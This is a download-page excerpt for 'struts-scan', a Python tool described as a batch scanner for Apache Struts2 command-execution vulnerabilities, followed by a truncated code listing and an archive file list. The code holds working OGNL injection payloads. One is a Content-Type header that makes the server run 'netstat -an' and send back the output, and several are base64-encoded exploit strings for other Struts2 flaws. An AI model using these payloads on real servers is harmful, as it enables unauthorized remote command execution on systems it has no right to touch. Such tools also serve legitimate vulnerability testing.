资源简介
struts2 漏洞检测工具 ,快速检测struts命令执行漏洞,可批量。运行环境要求:MAC/Linux下的Python2、Python3 。支持ST2-005,ST2-008,ST2-009,ST2-013,ST2-016,ST2-019,ST2-020,ST2-devmode,ST2-032,ST2-033,ST2-037,ST2-045,ST2-046,ST2-048,ST2-052,ST2-053,ST2-057的漏洞检测
代码片段和文件信息
#!/usr/bin/env python
# coding=utf-8
# code by Lucifer
# Date 2017/10/22
import re
import sys
import socket
import base64
import httplib
import warnings
import requests
from termcolor import cprint
from urlparse import urlparse
warnings.filterwarnings(“ignore“)
reload(sys)
sys.setdefaultencoding(‘utf-8‘)
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = ‘HTTP/1.0‘
#超时设置
TMOUT=10
headers = {
“Accept“:“application/x-shockwave-flash image/gif image/x-xbitmap image/jpeg image/pjpeg application/vnd.ms-excel application/vnd.ms-powerpoint application/msword */*“
“User-Agent“:“Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML like Gecko) Version/5.1 Safari/534.50“
“Content-Type“:“application/x-www-form-urlencoded“
}
headers2 = {
“User-Agent“:“Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML like Gecko) Version/5.1 Safari/534.50“
“Accept“:“application/x-shockwave-flash image/gif image/x-xbitmap image/jpeg image/pjpeg application/vnd.ms-excel application/vnd.ms-powerpoint application/msword */*“
“Content-Type“:“%{(#nike=‘multipart/form-data‘).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘netstat -an‘).(#iswin=(@java.lang.System@getProperty(‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘‘/c‘#cmd}:{‘/bin/bash‘‘-c‘#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream()#ros)).(#ros.flush())}“
}
headers_052 = {
“Accept“:“text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8“
“User-Agent“:“Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML like Gecko) Version/5.1 Safari/534.50“
“Content-Type“:“application/xml“
}
class struts_baseverify:
def __init__(self url):
self.url = url
self.poc = {
“ST2-005“:base64.b64decode(“KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCduZXRzdGF0IC1hblwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKS
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2018-09-05 10:46 struts-scan-master\
文件 1331 2018-09-05 10:46 struts-scan-master\README.md
目录 0 2018-09-05 10:46 struts-scan-master\images\
文件 101622 2018-09-05 10:46 struts-scan-master\images\exp.png
文件 429184 2018-09-05 10:46 struts-scan-master\images\poc.png
文件 6551592 2018-09-05 10:46 struts-scan-master\struts-scan
文件 5953600 2018-09-05 10:46 struts-scan-master\struts-scan.exe
文件 49906 2018-09-05 10:46 struts-scan-master\struts-scan2.py
文件 115 2018-11-07 10:14 struts-scan-master\start.bat
文件 50061 2018-11-06 09:39 struts-scan-master\struts-scan3.py
评论
共有 条评论